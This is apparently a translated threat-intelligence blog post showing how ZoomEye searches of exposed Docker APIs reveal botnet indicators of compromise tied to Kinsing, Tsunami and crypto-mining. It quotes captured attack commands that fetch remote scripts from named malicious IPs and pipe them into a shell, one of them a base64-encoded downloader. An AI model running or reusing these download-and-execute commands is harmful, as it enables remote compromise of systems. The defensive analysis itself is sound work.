Shulou(Shulou.com)06/01 Report--

This article introduces how to get IOC in ZoomEye. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Recently, when I used ZoomEye to search for some malicious IOC IP information, I found a malicious IP:194.38.20.199 that is still active and queried directly in ZoomEye: 194.38.20.199-ip:194.38.20.199 explained: the previous IP is a global match of strings, and the purpose of the latter-ip:194.38.20.199 is to exclude some information about the port service opened by IP. The results are as follows: 129 results are obtained, mainly redis and docker services: these are all traces left over from the crime committed by this group and captured by ZoomEye. It can be seen from the redis records that the attack is carried out by setting master_host (refer to https://paper.seebug.org/975/). While the docker service acquires container information through docker api, it seems that the image Command command is set to execute the command:

/ bin/bash-c 'apt-get update & & apt-get install-y wget cron;service cron start; wget-Q-O-194.38.20.199/d.sh | sh;tail-f / dev/null' "

Visit to determine whether the current IP service is still alive! In many things, automatic attacks such as botnets will leave behind a lot of attack traces, and these traces can be captured by cyberspace search engines, such as https://paper.seebug.org/595/ or, for example, a new Matryosh botnet captured by 360netlab not long ago to spread by attacking adb services. Foreign researchers have found that interesting information https://twitter.com/r3dbU7z/status/1356802656493264896 can be captured through ZoomEye. Let's go back to this subject case. In these hacked docker api services, we can use ZoomEye to search for traces such as wget or curl or apt-get to determine the intruding target and other hacker groups or IOC information. We take wget as an example to search syntax as follows:

"Server: Docker" + "Content-Type: application/json" + wget

So far, 71 search results have been found (note that this result may change at any time because ZoomEye uses the method of overwriting and updating, for example, if the service is restored to normal after being invaded, it will be replaced.) search for other groups or IOC syntax as follows:

"Server: Docker" + "Content-Type: application/json" + wget-194.38.20.199

The targets containing 194.38.20.199 were excluded and 19 results were obtained. Find one at random:

"Command": "sh-c 'wget-qO-http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail-f / dev/null'"

Find a new 34.66.229.152 [also alive] open source threat intelligence shows that this is Tsunami's DDOS gang, let's continue with the syntax:

"Server: Docker" + "Content-Type: application/json" + wget-194.38.20.199-34.66.229.152

Get 2 targets, take a look at the Command information in banner, get 2 malicious IP 45.137.155.55 [also alive] and 209.141.40.190 [also alive]

"Command": "/ bin/bash-c 'apt-get update & & apt-get install-y wget cron;service cron start; wget-Q-O-45.137.155.55/d.sh | sh;tail-f / dev/null'"

From the point of view of this command format and d.sh, it is very similar to 194.38.20.199, which can be attributed to Kinsing for the time being.

"Command": "chroot / mnt / bin/sh-c 'curl-s http://209.141.40.190/xms | bash-sh; wget-Q-O-http://209.141.40.190/xms | bash-sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64-d | bash -; lwp-download http://209.141.40.190/xms / tmp/xms; bash / tmp/xms; rm-rf / tmp/xms'"

It seems to be another mining related, so so far we have finally found the following malicious IOC:194.38.20.199/45.137.155.55 Kinsing/ mining 34.66.229.152 Tsunami/DDOS209.141.40.190 unknown / mining by searching wget in the Docker API information. Of course, you can also analyze which sh scripts are extracted and associated with more IOC IP addresses, which does not continue if it is not related to the topic.

On how to get IOC in ZoomEye to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.